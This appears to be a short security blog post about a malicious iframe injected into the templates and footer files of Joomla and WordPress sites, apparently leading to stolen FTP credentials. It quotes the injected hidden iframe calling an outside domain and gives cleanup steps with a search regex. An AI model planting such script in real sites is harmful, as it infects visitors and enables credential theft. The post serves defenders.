We started seeing a lot of websites infected with a malscript that looks like:

iframe frameborder="0" onload=' if (!this.src) { this.src="http://binglbalts.com/grep/"; this.height=0; this.width=0; } '>/iframe

In Joomla sites we’ve found it in /templates/index.php toward the bottom. In WordPress blog sites, we’ve seen it in the footer.php file.

We’ve usually been finding them toward the bottom of webpages. As of this writing the binglbalts.com domain is still active.

It turn out the result of these infections has been stolen FTP credentials. We’ve been able to view the logs of numerous sites that have been hacked by binglbalts.com and we can see the IP addresses of where the infection is coming from.

To clean this, first change all FTP passwords.

Second, you’ll have to download your entire site onto your PC or Mac. Then use grepWin and use this as the search string:

iframe/s*frameborder=\"0\" onload=\' if \(\!this\.src\)/s*\{/s*this\.src=\"http:\/\/binglbalts\.com\/grep\/\"; this\.height=0; this\.width=0;/s*\} \'>